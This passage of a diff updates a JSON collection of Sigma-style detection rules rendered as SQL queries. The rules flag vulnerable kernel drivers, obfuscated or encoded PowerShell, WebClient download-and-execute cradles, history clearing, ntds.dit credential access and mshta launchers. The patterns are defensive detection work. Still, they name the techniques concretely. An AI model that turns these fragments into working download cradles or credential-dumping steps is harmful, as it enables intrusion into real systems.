OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "NTLMv1 Logon Between Client and Server", - "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "author": "Tim Shelton", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1550.002", - "attack.s0363" + "attack.t1059.005" ], "falsepositives": [ - "Environments that use NTLMv1" + "Legitimate administrative scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_lsasrv_ntlmv1.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "PowerShell Decompress Commands", + "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "status": "test", + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" + "filename": "posh_pm_decompress_commands.yml" }, { - "title": "Windows Update Error", - "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "status": "test", - "description": "Windows Update get some error Check if need a 0-days KB", - "author": "frack113", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "status": "experimental", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_susp_system_update_error.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1070.003" ], "falsepositives": [ - "Unlikely" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate use of the tool" + "Administrator PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", - "status": "experimental", - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Use Get-NetTCPConnection - PowerShell Module", + "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_susp_get_nettcpconnection.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the library for administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "author": "Nikita Nazarov, oscd.community", @@ -4634,1522 +4197,1490 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Application Uninstalled", - "id": "570ae5ec-33dc-427c-b815-db86228ad43e", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "An application has been removed. Check if it is critical.", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_builtin_remove_application.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', 